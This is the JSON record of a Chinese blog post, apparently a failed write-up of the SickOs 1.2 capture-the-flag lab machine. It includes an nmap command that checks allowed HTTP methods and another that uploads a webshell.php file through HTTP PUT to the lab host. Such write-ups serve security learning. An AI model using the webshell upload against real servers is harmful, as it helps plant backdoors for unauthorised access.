src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320661.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240207114331521\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>6\uff0c\u771f\u4e0d\u77e5\u9053\u9519\u5728\u54ea\u91cc\u4e86\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320662.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320662.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240207114954782\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5c1d\u8bd5\u5176\u4ed6\u6f0f\u6d1e\u5427<\/h3>\n<p>\u672a\u53d1\u73b0\u53ef\u4ee5\u5229\u7528\u7684\u6f0f\u6d1e\u3002\u3002\u3002\u3002<\/p>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p>\u5e08\u5085\u4eec\u4f7f\u7528<code>nmap<\/code>\u8fdb\u884c\u4e86\u626b\u63cf\uff0c\u5f97\u77e5\u4e86put\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-shell\">nmap --script http-methods --script-args http-methods.url-path=&#039;\/test&#039; 192.168.244.183<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320663.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320663.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205224037334\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u4f20\u5165\u6587\u4ef6\u7684\u65f6\u5019\u53ef\u4ee5\u91c7\u7528\uff1a<\/p>\n<pre><code class=\"language-shell\">nmap 192.168.244.183 -p 80 --script http-put --script-args http-put.url=&#039;\/test\/nmap_webshell.php&#039;,http-put.file=&#039;\/home\/kali\/temp\/webshell.php&#039;<\/code><\/pre>\n<p>\u4f46\u662f\u6211\u8fd9\u91cc\u5931\u8d25\u4e86\uff0c\u4e0d\u77e5\u9053\u4e3a\u5565\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320664.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402071320664.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240205232539742\" style=\"zoom:50%;\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SICKOS: 1.2\uff08\u5931\u8d25\uff09 \u9009\u62e9\u6253\u5f00\u73af\u5883\uff08VMware\uff09 \u53ef\u4ee5\u4f7f\u7528VMware\u6253\u5f00\uff0cVirtualBox\u6253 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-358","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/358","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=358"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/358\/revisions"}],"predecessor-version":[{"id":359,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/358\/revisions\/359"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=358"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=358"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=358"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}